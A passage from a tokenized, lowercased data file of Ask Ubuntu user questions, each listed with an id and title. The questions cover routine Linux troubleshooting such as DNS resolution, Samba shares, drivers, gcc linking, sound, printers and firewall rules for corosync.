updates be secure . lastly , i do not want to install samba . it seems to me to be unnecessary for my environment . seems simple to me - a linux dhcp server that will securely update windows ad/dns records . james
428405	dns / resolve issue with certain commands	i have dnsmasq running on my gateway and have populated /etc/hosts with host information for my lan . this works great for all my workstation they can resolve both short and long host names , e.g . workstation01 or workstation01.example.org . the problem i am having is my samba server which is running ubuntu is not able to resolve the internal hosts when i use specific commands ( e.g . ping , telnet , ssh ) . in /etc/resolv.conf i have the following single line nameserver 10.0.0.1 and my /etc/nsswitch.conf contains passwd : files ldap group : files ldap shadow : files ldap hosts : files mdns4_minimal [ notfound=return ] dns mdns4 networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis host : $ host workstation01 workstation01 has address 10.0.0.21 dig : $ dig workstation01 ; < < > > dig 9.7.3 < < > > workstation01 ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 19469 ; ; flags : qr aa rd ra ; query : 1 , answer : 1 , authority : 0 , additional : 0 ; ; question section : ; workstation01 . in a ; ; answer section : workstation01 . 0 in a 10.0.0.21 ; ; query time : 0 msec ; ; server : 10.0.0.1.200 # 53 ( 10.0.0.1 ) ; ; when : sat mar 1 11:11:11 2014 ; ; msg size rcvd : 37 ping : $ ping workstation01 ping : unknown host workstation01 on the server side , the /etc/hosts entry for dnsmasq is 10.0.0.21 workstation01 workstation.example.org workstation.example
428406	touchpad on fujiitsu lifebook ah532 not working correctly	ubuntu 13.10 , fujitsu lifebook ah532 touchpad appearing as ps/2 mouse under xinput -- list , so no multi-touch or scroll support or anything like that . have tried installing alternate driver as described on launchpad , specifically in this comment but it fails on the build step ; sudo dkms build psmouse/alps-dst-1.0 ) with error ! bad return status for module build on kernel : 3.11.0-15-generic ( x86_64 ) consult /var/lib/dkms/psmouse/alps-dst-1.0/build/make.log for more information . make.log mentioned contains the following : dkms make.log for psmouse-alps-dst-1.0 for kernel 3.11.0-15-generic ( x86_64 ) sun mar 2 14:17:16 gmt 2014 make : entering directory `/usr/src/linux-headers-3.11.0-15-generic' scripts/makefile.build:44 : /var/lib/dkms/psmouse/alps-1.3/build/src/makefile : no such file or directory make [ 1 ] : *** no rule to make target `/var/lib/dkms/psmouse/alps-1.3/build/src/makefile ' . stop . make : *** [ psmouse.ko ] error 2 make : leaving directory `/usr/src/linux-headers-3.11.0-15-generic' i 've also seen this post that says installing dell alps driver worked.. but after much searching of how to do this , and trying a few different things , i 've had no luck with that either . maybe a slightly different model/ubuntu version ? any help greatly appreciated , i 'm stumped !
428408	can not ping google using proxy	i am using a proxy to connect to internet . i can use firefox and software center . but can not ping google . when i try it says ping google.com ping : unknown host google.com i have tried with ip address also . it says destination host unreachable . please help . thanks in advance .
428412	samba permissions	i 'm setting up a nas server , and i 'm trying to configure samba . i can see the share on my windows clinet , but i ca n't write anything in it . my smb.conf looks like this : [ global ] workgroup=workgroup security=share [ myshare ] comment = share guest ok=yes read only=no path=/media/disk browseable=yes writeable=yes i can see the directory , read all the files , but can not write anything . in fact , if i look at smbstatus , i see rdonly on the share , so something probably is missing . any idea ?
428413	how to change nvidia graphic resolution in ubuntu 12.04 ?	i ran this command in the terminal : sudo service lightdm stop after that the only resolution that i have is 640*480 ! my screen 's resolution is 1366*768 in windows . how can i set the resolution to 1366*768 ? ?
428417	aws elastic beanstalk command line tool setup	i have the aws elastic beanstalk command line tool running on my ubuntu 12.04 lts virtual machine but i can only get it to work if i set the location of eb to the exact website folder i am going to deploy . i would have thought i could have put this somewhere generic and called it at whatever location i was in . this is how i am having to set it up at the moment : export path= $ path : /home/lee/websites/my-specific-website-folder/aws-cli/eb/linux/python2.7/
428422	unable to setup samba fileshare	my girlfriend has to create a samba server to create file sharing possibilities between ubuntu and multiple windows 7 computers as a school project . her teacher is unable to assist her , so i tried to help her a bit . i have tried multiple guides on how to set up a samba network ( this , this and this ) , but each of them seems a totally different approach and none of them seem to work . it could be that i am doing something wrong , but the computers just do n't seem to connect , which could be caused by anything ... summary of what i tried : install samba setup the server settings ( my windows workgroup is just 'workgroup ' which is the default option ) after this i tried a myriad of things : editing the samba config file to share a folder ( as per the official ubuntu guide ) using the samba gui to share a folder adding new users to samba checking if my file and printer sharing option on windows is enabled and a lot more which i probably forgot i did after all this , the windows computers still do n't recognize the file share . it does not show up on the network and running the ip-adres also does not work . does anybody have a simple step by step guide on how to create a samba server to use with ubuntu 12.04 and windows 7 . it only has to be a simple server , with a enabled password and some files in it . if there is better software than samba for this job , please let me know and thanks for the help !
428423	ubuntu installed via usb how do i uninstall ubuntu	in installed via web to a usb stick . never received welcome screen . just a dos option to choose xp or ubuntu . if i choose to uninstall where is this option ? thanks
428426	tab view html 5 app	i am trying to understand the basics of the ubuntu html5 ui . i have used the following sample code from developer.ubuntu.com < body > < div data-role= '' mainview '' > < header data-role= '' header '' > < ul data-role= '' tabs '' > < li data-role= '' tabitem '' data-page= '' main '' > main < /li > < li data-role= '' tabitem '' data-page= '' anotherpage '' > another < /li > < /ul > < /header > < div data-role= '' content '' > < div data-role= '' tab '' id= '' main '' > main < /div > < div data-role= '' tab '' id= '' anotherpage '' > another < /div > < /div > < /div > < /body > when i run this basic code from the sdk i get a top navigation element with 2 tabs and a main display below displaying the text : `` main '' . so far so good . now when i try to change the tab to `` another '' , the navigation animation runs , the tab switches in the title but nothing happens in the mainview area . also , the navigation appears to be dead after this . it no longer responds to any input at all . what am i doing wrong ?
428429	ubuntu gets slow when i play minecraft	when i play minecraft it runs super well no lag at all , but when i use ubuntu with minecraft on it seems to be that ubuntu gets super slow it takes 5 seconds to get to my home folder it has never done that before i also try to run a bukkit server it works well but the i use a plugin and i get a timeout error ever since ubuntu got slow bukkit always crashed . can anyone help ? i have 2.9 gb ram . thank you
428431	wi-fi not working in ubuntu 12.04	i recently installed ubuntu 12.04 on my dell inspiron 15 7537 . it was working fine but after installing some updates ( not sure which ones ) i rebooted and could no longer connect to wi-fi . it 's a dual boot with windows 8.1 and wi-fi works fine for that and ubuntu does let me connect using a wired connection . after reinstalling it 's still giving me the issue which makes me think it 's a hardware fault but the fact it works in windows is making me doubt that . one thing worth noting is that when i start ubuntu it displays the following : iwlwifi 0000:02:00.0z request for firmware file 'iwlwifi-7200-7.ucode ' failed iwlwifi 0000:02:00.0z no suitable firmware found ! any help would be much appreciated .
428433	-lm option does n't work in gcc 4.8.1	i know i 'm not supposed to be posting problems related to programming here . but i could n't think of any better place and it 's quite relevant too . the problem is exactly what the title indicates : when i write a program in c language and it contains # include < math.h > it does n't compile . i tried the -lm option in every variety i could find online . when i worked in gcc 4.7.3 i just had to add the -lm in the end and it worked , for example : gcc -o test test.c -lm . another thing . in /usr/lib/gcc/i686-linux-gnu folder i found 4.7 4.7.3 4.8 4.8.1 folders . is it some conflict the new version is having with old ones ? and is it just gcc which has changed the procedures of -lm ? please suggest how i can compile programs containing the math library functions with gcc 4.8.1 . and i am using ubuntu 13.10 which i have recently updated from 12.10 . the earlier version of gcc was 4.7.3 . oh by the way , this is the usual output i get when trying to compile : $ gcc -o test test.c -lm test.c:1:19 : fatal error : stdio.h : no such file or directory # include < stdio.h > ^ compilation terminated . a sample program that suffered from this follows : # include < stdio.h > # include < math.h > int main ( void ) { double amount ; double principal = 1000.0 ; double rate = .05 ; int year ; printf ( `` % 4s % 21s\n '' , `` year '' , `` amount on deposit '' ) ; for ( year = 1 ; year < = 10 ; year++ ) { amount = principal * pow ( 1.0 + rate , year ) ; printf ( `` % 4d % 21.2f\n '' , year , amount ) ; } return 0 ; } and here 's the information about the current version of my gcc : $ which -a gcc /usr/bin/gcc $ gcc -- version gcc ( ubuntu/linaro 4.8.1-10ubuntu9 ) 4.8.1 copyright ( c ) 2013 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . $ ls -l /usr/include/stdio.h /usr/include/math.h ls : can not access /usr/include/stdio.h : no such file or directory ls : can not access /usr/include/math.h : no such file or directory and there is no whitespace before the # . also , no program containing the stdio.h directive showed such problem .
428435	user/admin password using the root shell , new password is not recognized by the system when doing ssh	when i reset user/admin password using the root shell cli , it says that the password reset was successful . but , when i try to exit and normally reboot , the new password is not recognized by the system . why is it not working ? username : bdcubuntu password : * * * * * * * also i can not ssh into the account . attached image file shows : error message when i want to rechange the password . my home has only one bdcubuntu account contents of my /etc/passwd file
428441	in the currencyconverter ubuntu sdk qml example where does the index variable come from ?	in ubuntu sdk qml tutorial a simple currency converter is build . the complete qml source code can be found here . when working through the example i found the following snippet somewhat confusing , particularly line 92 where the index field is assigned to caller.currencyindex . listview { clip : true width : parent.width height : parent.height - header.height model : currencies delegate : standard { objectname : `` popovercurrencyselector '' text : currency onclicked : { caller.currencyindex = index // where does index come from ? caller.input.update ( ) hide ( ) } } } i could n't find any clue in the documentation where index is defined . what it should contain is absolutely obvious , but where does it come from ? if it is a property of the standard list view item it is nowhere documented .
428442	unable to mount hdd from terminal	i currently have two hard drives installed on my computer : $ sudo lsblk -o name , fstype , size , mountpoint , label name fstype size mountpoint label sda 465.8g ├─sda1 ext4 10.5g ├─sda2 ext4 3.4g └─sda4 ext4 233.3g / sdb 465.8g sr0 1024m sdb is my second drive , which is currently empty . i would like to mount to it to copy some files to it before using it as a backup drive . note that sdb , as expected , exists in the device folder as a disk file : /dev $ ls -l | grep sdb brw-rw -- -- 1 root disk 8 , 16 mar 2 11:14 sdb i created a directory called backup in my media directory : /media $ sudo mkdir backup i tried to mount to it : sudo mount /dev/sdb /media/backup mount : you must specify the filesystem type i tried to specify filesystem type : sudo mount /dev/sdb /media/backup mount : you must specify the filesystem type /media $ sudo mount -t ext4 /dev/sdb /media/backup mount : wrong fs type , bad option , bad superblock on /dev/sdb , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i do n't know what all these errors are about . sdb is an unformatted drive . i just want to mount to it to view it for right now .
428445	how do i extract the version number portion from the version string ?	how do i extract the version number from string=customer-asset-tag-1.0.2.9 ? desired result : component= customer-asset-tag version number=1.0.2.9
428452	show date and time on guvcviewer recordings ?	i am using guvcviewer to record video using my webcam . how do i display the current date time on the video which is being recorded ?
428455	how to recover after deleting ubuntu partition ?	i have a really old compaq presario , i recently just wiped it clean and started again . i put windows 7 on but , half way through installing it ran out of battery ... thinking nothing of it i just done it again , i partitioned my harddrive installed ununtu 12.04.4 . no all went well , it ran fine it ran better than before infact , ubuntu ran smoothly and i had no troubles ( apart from getting used to it ) so anyway . today i was looking in disc management and noticed my hard drive was in 4 parts ... long story short i deleted ubuntu partiton and on reboot it went to the grub recovery etc etc . i did n't want to bother anyone on here with n00b like question , but . i tried everything on askubuntu i tried the ls ( hd0 , msdos1/2/3 ) etc i tried to fix the graphics thingy in the purple screen ? everytjing . i tried to reboot windows to repair partition or whatever , but when i load it up it either has a black screen with a flashing ' - ' or it will say 'press any key to boot from dvd ' etc i push a key and then it just goes black and my disc drive makes sounds as though it 's working ? is this a problem i can fix ? or is my computer ruined ? sorry for bad spelling grammar i 'm doing this on my phone quickly . okay , here is a more detailed ( i hope anyway ) version of the above taking into account everything i have been told just a minuet ago . okay , i 'll try and break it down as easy as possible . so , set up computer > it ran fine > today i deleted the partition that had ubuntu on it . i restarted my computer and was confronted with grub rescue > i looked up how i could recover partition i.e the ls ( hd0 , msdos1 or 2 etc and everytime on every code it came back with 'unknown filesystem ' so from here i looked what else it might be . someone suggested i run windows through disc and repair windows . which leads me to the black screen with a flashing ' - ' or if it asks me to press any key to boot from cd or dvd , i would press enter and my disc drive would make the noises it normally does when working , but the screen would just be black . so i tried to go into bios fix some settings in there , save & exit > comp restarts > exactly the same things happen . now if i have the ubuntu disc in , sometimes it will have the grub rescue screen and sometimes it will come up with the purple screen and the two icons at the bottom of the screen , now , if i press a key sometimes it will go to a still screen with ubuntu ( not the loading one it 's just the logo ) on it and nothing will happen , other times it wo n't do anything ? i just tried to have a look at one of the answers about nomodeset as that sounds like what 's up ? but every code i punched in ( even the one that 's potentially dangerous for fan etc ) it will just start a new line like i did n't out any code in at all ? i really hope that 's a bit clearer . forgot to mention as well that once or twice it has gone to the ubuntu load up screen as if it 's starting up normally ? but it wo n't go any further than that ? i really hope that 's a bit clearer . thank you for you time hope i have n't made you all rip your hair out .
428457	ubuntu 13.10 does not shutdown my computer	i know there is another thread for this issue , but the website does not let me add any comments , it says i need to have 50 reputation . anyway , i just installed my first linux os on my test laptop a dell latitude d620 but it neither shutdown nor reboot . i searched it some body said use the commands below : sudo shudown -h now and sudo shutdown -r now as soon as i input the commands and input my password , the system starts to work but i receive the message below : mismatch in adjust_mode.flags ( expected 2 , found 0 ) again i searched - it seems there is something wrong with my graphic card , i have no clue ! ! ! please advise . thank you in advance for your time r
428458	why do shells call fork ( ) ?	when a process is started from a shell , why does the shell fork itself before executing the process ? for example , when the user inputs grep blabla foo , why ca n't the shell just call exec ( ) on grep without a child shell ? also , when a shell forks itself within a gui terminal emulator , does it start another terminal emulator ? ( such as pts/13 starting pts/14 )
428461	gedit external tools build broken	i 've enabled external tools in gedit and ever ytime i attempt to use the build tool either by pressing ctrl+f8 or by clicking the menu item nothing seems to happen . it should run the make command . every other tool on the list seems to work and i can even create new tools with new hotkeys that work , it just seems to be the build ctrl+f8 that is not working . also , where does gedit in ubuntu 13.10 stores its configuration files , since i deleted the ~/.config/gedit directory for a few time and is seems to regenerate whenever i start up gedit again . i would like to revert it back to its original settings to see if that fixes it . any ideas as to what this could be ?
428464	gnome session log getting too large	under my user a hidden system folder .cache/upstart/ is getting insanely large - 99g . this is mainly due to a file gnome-session.log . does anybody know what this folder is and why it may get so large ? can i safely remove the file ?
428465	vlc media player automatically create a blank duplicate when i open it	when i open any video file with vlc media player , automatically another blank vlc media player is opening . and when i close the blank vlc player , both player turn off ! is there any solution ?
428466	how to fix no sound in ubuntu 12.04 with mate desktop environment ?	after the most recent update since 3/2/2014 , i can not listen to music on my ubuntu 12.04 desktop or any other sound from an application . i was able to perform the following test from the command line ~ $ speaker-test -dplug : surround51 -c6 -l1 -twav speaker-test 1.0.25 playback device is plug : surround51 stream parameters are 48000hz , s16_le , 6 channels wav file ( s ) rate set to 48000hz ( requested 48000hz ) buffer size range from 64 to 5440 period size range from 32 to 2720 using max buffer size 5440 periods = 4 was set period_size = 1088 was set buffer_size = 5440 0 - front left 4 - center 1 - front right 3 - rear right 2 - rear left 5 - lfe time per period = 8.545722 i could hear `` front left '' from the audio test , but no other sound . any suggestions ? below is the audio device information . ~ $ lspci -nnk | grep -ia2 audio 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) [ 1002:4383 ] ( rev 40 ) subsystem : hewlett-packard company device [ 103c:2ac8 ] kernel driver in use : snd_hda_intel -- 01:00.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] turks/whistler hdmi audio [ radeon hd 6000 series ] [ 1002 : aa90 ] subsystem : xfx pine group inc. device [ 1682 : aa90 ] kernel driver in use : snd_hda_intel below is the alasmixer information ┌───────────────────────────── alsamixer v1.0.25 ──────────────────────────────┐ │ card : hda ati sb f1 : help │ │ chip : idt 92hd89e2 f2 : system information │ │ view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card │ │ item : master [ db gain : 0.00 ] esc : exit │ │ │ │ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ > │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │▒▒│ │ │ ├──┤ ├──┤ └──┘ ├──┤ mic in ├──┤ ├──┤ ├──┤ │ │ │oo│ │oo│ │oo│ │oo│ │oo│ │oo│ │ │ └──┘ └──┘ └──┘ └──┘ └──┘ └──┘ │ │ 100 100 < > 100 100 < > 100 100 < > 100 100 < > 100 100 100 │ │ < master > headphon pcm front front mi surround center lfe │ └──────────────────────────────────────────────────────────────────────────────┘ i am able to play web videos without crashing or freezing , but no audio can be heard from any web application . i can hear the bongo drums on start up . i downloaded the following mp3s file and saved into my music folder . i used the following terminal command below to play the mp3 file . ~/music $ xmms2 play 02\ -\ frozen.mp3 ~/music $ i was unable to hear any audio from xmms2 playing frozen.mp3 . i opened vlc from the terminal and played the mp3 file from the gui . below is the terminal feedback from vlc while playing the mp3 file . ~ $ vlc vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0x2124108 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . got bus address : `` unix : abstract=/tmp/dbus-wjn42ezxf0 , guid=badc6b7aa96a1558a4e1655900000de8 '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-wjn42ezxf0 , guid=badc6b7aa96a1558a4e1655900000de8 '' registered dec : true '' sni-qt/6878 '' warn 14:58:38.756 void statusnotifieritemfactory : :connecttosnw ( ) invalid interface to snw_service registered event listener change listener : true qspiaccessible : :accessibleevent not handled : `` 6 '' obj : qmenu ( 0x7feec4099610 ) `` '' qspiaccessible : :accessibleevent not handled : `` 7 '' obj : qmenu ( 0x7feec4099610 ) `` '' qspiaccessible : :accessibleevent not handled : `` 8008 '' obj : qobject ( 0x0 ) `` invalid interface ! '' qspiaccessible : :accessibleevent not handled : `` 8008 '' obj : qsidebar ( 0x7feec41ff800 , name = `` sidebar '' ) `` sidebar '' fixme : handle dialog start . qspiaccessible : :accessibleevent not handled : `` 8008 '' obj : qobject ( 0x0 ) `` invalid interface ! '' qspiaccessible : :accessibleevent not handled : `` 8008 '' obj : qlistview ( 0x7feec4205500 , name = `` listview '' ) `` listview '' qspiaccessible : :accessibleevent not handled : `` 8008 '' obj : qobject ( 0x0 ) `` invalid interface ! '' fixme : handle dialog end . i did not hear any sound from vlc . below is the analog output file . ~ $ analog output analog : analog version 6.0/unix analog : warning d : turning all pie charts off because outfile is stdout and chartdir is unset ( for help on all errors and warnings , see /usr/share/doc/analog/docs/errors.html ) analog : warning f : failed to open logfile output : ignoring it analog : warning r : turning off empty time reports analog : warning r : turning off empty request report analog : warning r : turning off empty file type report analog : warning r : turning off empty directory report analog : warning r : turning off empty domain report analog : warning r : turning off empty organisation report analog : warning r : turning off empty search word report analog : warning r : turning off empty operating system report analog : warning r : turning off empty file size report analog : warning r : turning off empty status code report < ? xml version= '' 1.0 '' encoding= '' iso-8859-1 '' ? > < ? xml-stylesheet href= '' # internalstyle '' type= '' text/css '' ? > < ! doctype html public `` -//w3c//dtd xhtml 1.0 strict//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-strict.dtd '' > < html xmlns= '' http : //www.w3.org/1999/xhtml '' > < head > < title > web server statistics for debian linux system < /title > < meta http-equiv= '' content-type '' content= '' text/html ; charset=iso-8859-1 '' / > < meta name= '' robots '' content= '' noindex , nofollow '' / > < meta name= '' generator '' content= '' analog 6.0/unix '' / > < style type= '' text/css '' id= '' internalstyle '' > h2 { background-color : # a0c0f0 ; width : 98 % ; padding : 3px 6px ; } table { text-align : right ; margin-left : 30px ; background-color : # d0e0f0 ; border-collapse : collapse ; } th { border-bottom : 1px solid # 404050 ; border-right : 1px dotted # 606070 ; border-top : none ; border-left : none ; padding : 0px 5px 1px 5px ; font-weight : bold ; background-color : # a0c0f0 ; } td { padding : 0px 5px 1px 5px ; border-right : 1px dotted # 606070 ; border-left : none ; border-bottom : none ; border-top : none ; } td.x { font-family : monospace ; white-space : pre ; } .xl { text-align : left ; border-right : none ; } .xr { text-align : right ; border-right : none ; } .bar { text-align : left ; border-right : none ; } tr.sub { background-color : # c0c0ff ; font-style : italic ; } .repdesc { font-style : italic ; } .repspan { font-style : italic ; } .goto { font-size : small ; } .gensumtitle { font-weight : bold ; } .gototitle { font-weight : bold ; } .runtimetitle { font-weight : bold ; } img { border-style : none ; } a : link { color : blue ; text-decoration : none ; } a : visited { color : purple ; text-decoration : none ; } a : link : hover { text-decoration : underline ; } a : visited : hover { text-decoration : underline ; } a : link : active { color : red ; text-decoration : underline ; } a : visited : active { color : red ; text-decoration : underline ; } < /style > < /head > < body > < div class= '' header '' > < h1 > < a name= '' top '' id= '' top '' href= '' http : //www.analog.cx/ '' > < img src= '' /analog/analogo.png '' alt= '' '' / > < /a > web server statistics for < a href= '' / '' > debian linux system < /a > < /h1 > < p class= '' analysisspan '' > program started at sun-02-mar-2014 17:10. < /p > < /div > < div class= '' gensum '' > < h2 > < a name= '' gensum '' id= '' gensum '' > general summary < /a > < /h2 > < p class= '' goto '' > ( < span class= '' gototitle '' > go to < /span > : < a href= '' # top '' > top < /a > | general summary ) < /p > < p class= '' repdesc '' > this report contains overall statistics. < /p > < p class= '' gensumlines '' > < span class= '' gensumtitle '' > successful requests : < /span > 0 < /p > < /div > < div class= '' footer '' > < p class= '' credit '' > this analysis was produced by < a href= '' http : //www.analog.cx/ '' > analog 6.0 < /a > . < br / > < span class= '' runtimetitle '' > running time : < /span > less than 1 second . < /p > < p class= '' goto '' > ( < span class= '' gototitle '' > go to < /span > : < a href= '' # top '' > top < /a > | < a href= '' # gensum '' > general summary < /a > ) < /p > < /div > < /body > < /html > below is the echo get current desktop command issued twice . ~ $ echo $ xdg_current_desktop ~ $ echo $ xdg_current_desktop ~ $ below is the gdm session command . ~ $ echo $ gdmsession mate ~ $ below is the installation attempt of the ubuntu desktop environment . ~ $ sudo apt-get install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done ubuntu-desktop is already the newest version . the following packages were automatically installed and are no longer required : libgconf-2-4 : i386 libatk1.0-0 : i386 libidn11 : i386 gir1.2-ubuntuoneui-3.0 libnss3 : i386 libdbus-glib-1-2 : i386 libncurses5-dev octave-common libcairo2 : i386 libreadline6-dev libdatrie1 : i386 libgdk-pixbuf2.0-0 : i386 libtinfo-dev libpixman-1-0 : i386 libcurl3 : i386 libxft2 : i386 liboctave1 libthai0 : i386 libnspr4 : i386 libxss1 : i386 libjasper1 : i386 libubuntuoneui-3.0-1 libxtst6 : i386 libhdf5-serial-dev thunderbird-globalmenu libpango1.0-0 : i386 libxcb-render0 : i386 librtmp0 : i386 libxcb-shm0 : i386 libgtk2.0-0 : i386 libreadline-dev use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ~ $ attempted to play music file using rhythmbox and received the following error : `` could n't start playback problem occurred without error being set . this is a bug in rhythmbox or gstreamer . '' below is the f6 command for selecting the generic audio output from alsamixer . the alsamixer terminal posted above is for the default which appears to be the same as the one named hda ati sb . there were three options to choose from alsamixer f6 command : `` - ( default ) '' , `` 0 hda ati sb '' , or `` 1 hd-audio generic '' , none of which produced any sound from the music files . ┌───────────────────────────── alsamixer v1.0.25 ──────────────────────────────┐ │ card : hd-audio generic f1 : help │ │ chip : ati r6xx hdmi f2 : system information │ │ view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card │ │ item : s/pdif esc : exit │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ┌──┐ │ │ │oo│ │ │ └──┘ │ │ < s/pdif > │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └──────────────────────────────────────────────────────────────────────────────┘ the image below is the closest menu i can find to sound settings . the image below is the selected options tab of sound settings with other menus opened to provide additional information .
428467	brightness in ubuntu 12.04	well this is a common problem as i have seen through my google searches but i did n't manage to find any satisfactory solution so far . i got my laptop recently which came with windows 8 pre-installed.i decided to install ubuntu ( i had it in my former laptop ) but the main problem is that when ubuntu starts the brightness is 0 be default ( my laptop has a backlit button too ) . i can use the fn buttons to change back to what i want but i wondered if there is a solution after all . the only solutions i found so far set the brightness in a default value which fix the low brightness problem after the start up but i cant control the brightness with the fn buttons afterwards . if anyone has a solution please share . thanks in advance . ps my laptop is lenovo g510
428470	brother hl-2270dw stops printing	i have a brother hl-2270dw . when i first installed the printer , it printed the test page fine . later , when i tried to print another document , the printer did not wake up and begin printing . i initially thought i was the problem ( i have only been using linux for a few days ) . after doing some research , it appeared i was doing everything right , so i power-cycled the device , and once it booted ubuntu immediately connected and printed the document . later , on a system that is usually not on our network ( a friend was over and needed to print something from his laptop ) . however , when using a windows 7 computer on the same network , there are no issues printing . i am running ubuntu 13.10 32-bit and he is running vista 64-bit . i realize that this indicates this is potentially a printer issue , but it may be an issue with both computers . as i am unfamiliar with ubuntu/linux and do not have consistent access to the vista computer , i thought i would try here . thank you in advance for any help !
428474	automatic say yes to make ext3 file system on disk	i am working on a script where i make a ext3 filesystem on a disk , the problem is that the script ask user to either say yes or no : root @ ubuntu : /home/school # mkfs.ext3 /dev/sdc mke2fs 1.42 ( 29-nov-2011 ) /dev/sdc is entire device , not just one partition ! proceed anyway ? ( y , n ) i have tried to put -y before mkfs and after sdc but that didnt work . do anyone have any solutions to do this without user interaction ?
428477	xlib : extension `` glx '' missing on display `` :0 '' . and opengl glx extension not supported by display ':0 '	i am trying to use opengl on my ubuntu 12.04 lts . i installed opengl with the following commands : sudo apt-get install g++ cmake sudo apt-get install freeglut3 freeglut3-dev sudo apt-get install binutils-gold i wrote a simple example in c++ and compiled it with g++ -lgl -lglut main.cpp -o test and then i tested it using ./test . a window opened but it was black and i did n't show anything . so , i installed my nvidia driver using the following commands : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get upgrade sudo apt-get install nvidia-current sudo apt-get install nvidia-settings sudo reboot and now when i try to run again the program it gives me the 2 errors : xlib : extension `` glx '' missing on display `` :0 '' . freeglut ( ./test ) : opengl glx extension not supported by display ':0' what could be the problem ? also , here is the output of the lspci | grep vga command : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev a1 )
428482	how to install and use hp deskjet ink advantage 2515	how to install and use hp deskjet ink advantage 2515 ? i have tried installing hplip package but it does not recognize printer when connected via usb . please suggest if anyone has came across same issue and resolved it .
428486	corosync & pacemaker iptables rules	when using corosync with two rings via multi-cast addresses 226.94.1.1 ( port 5405 ) & 226.94.1.2 ( port 5406 ) what iptables rules are required to allow two nodes to communicate optimally without giving any undue access and making the rules too lenient ? i current have : iptables -a input -p udp -m multiport -- dports 5404,5405,5406 -j accept will that allow all the communication a corosync/pacemaker setup requires for both rings ? i have heard arguments that something like : iptables -i input 1 -m pkttype -- pkt-type multicast -j accept is required . however i can not seem to replicate a situation where this assists if the first rule i listed above is already in place . the red hat documentation would seem to support the first approach . there is some ibm documentation espousing the second but is it just a case of a rule that is far too lenient when the first would do the job equally well whilst leaving no unnecessary ports open ? i 'm leaning more towards the first rule being sufficient but wanted to get some more opinions on the matter .
428487	most lightweight version of ubuntu ?	i 'm trying to run a webserver backbone at home , currently what i now need to do is setup the fileservers . i do n't have much money so i 'm using 4 scrapped apple tv 's ( 1st gen ) i found . according to wikipedia : *0.8 ghz proccessor *256 mb of ram *140 gb of disk space i was wondering what is the most `` lightweight '' version of ubuntu , that uses the lowest amount of processing and ram usage when on standbye or running a fileserver .
428488	how to go to root mode in ubuntu 12.04 ?	i 'm using ubuntu 12.04 . i want to login as root not just use sudo to run commands as root . can somebody please tell me what i have to do ?
428490	ubuntu installation problems via ms windows 7 64bit no go with 32bit	i have a problem installing ubuntu 12.4 or higher 32bit via the windows installer . i 've download both the win install for 32bit and the iso as well as extracted the iso into a folder and no matter which webui i use it tries to download a 64 bit version off the net even if i disable the internet connection . reasons being that the lastest 12.4x version ( 64bit ) of ubuntu is very unstable and it has broken packages all over the places and it does not like my ati/amd video card even if i remove all trace of the broken packages it still says that there are problem/broken packages even if they have been replaced with new or different ones several times over . atm i am trying to install ubuntu 13.x 32bit but it wo n't let me . now i can instal it in a virtual os like vmware . however i use ubutu as a backup os on the same partition as windows 7 . ubuntu is also useful for problem websites that windows has problems with . therefore the single block windows ubuntu install is the most useful for me . any ideas on how to get the 32bit version to install ? also yes i set the webui install exe file to window xp sp3 run as admin in the compatibility to see if that would get it to work . it did not .
428498	ubuntu not connecting to switch box	i recently took my dad 's old computer to use at a multimedia server , but when i hooked it up to the ethernet switch ( the computer sits under my desk so my main computer shares the switch ) and it says its connected but i cant even access my router page . my main computer connects fine , but the ubuntu computer does n't ...
